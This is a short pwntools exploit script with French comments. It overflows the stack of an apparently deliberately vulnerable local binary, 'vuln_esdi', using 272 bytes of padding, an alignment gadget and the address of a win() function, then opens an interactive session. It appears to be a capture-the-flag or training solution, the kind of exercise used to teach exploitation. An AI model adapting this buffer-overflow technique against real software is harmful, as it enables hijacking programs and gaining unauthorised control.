from pwn import *

elf = ELF('./vuln_esdi')
win_addr = 0x401156
offset = 272
ret_addr = 0x401016

# Ajoute un argument fictif pour win() (ex: 0xdeadbeef)
fake_arg = 0xdeadbeef

payload = b'A' * offset
payload += p64(ret_addr)  # Alignement
payload += p64(win_addr)  # Adresse de win()
payload += p64(fake_arg)  # Argument pour win()

p = process('./vuln_esdi')
p.recvuntil(b"Enter your name: ")
p.sendline(payload)
p.interactive()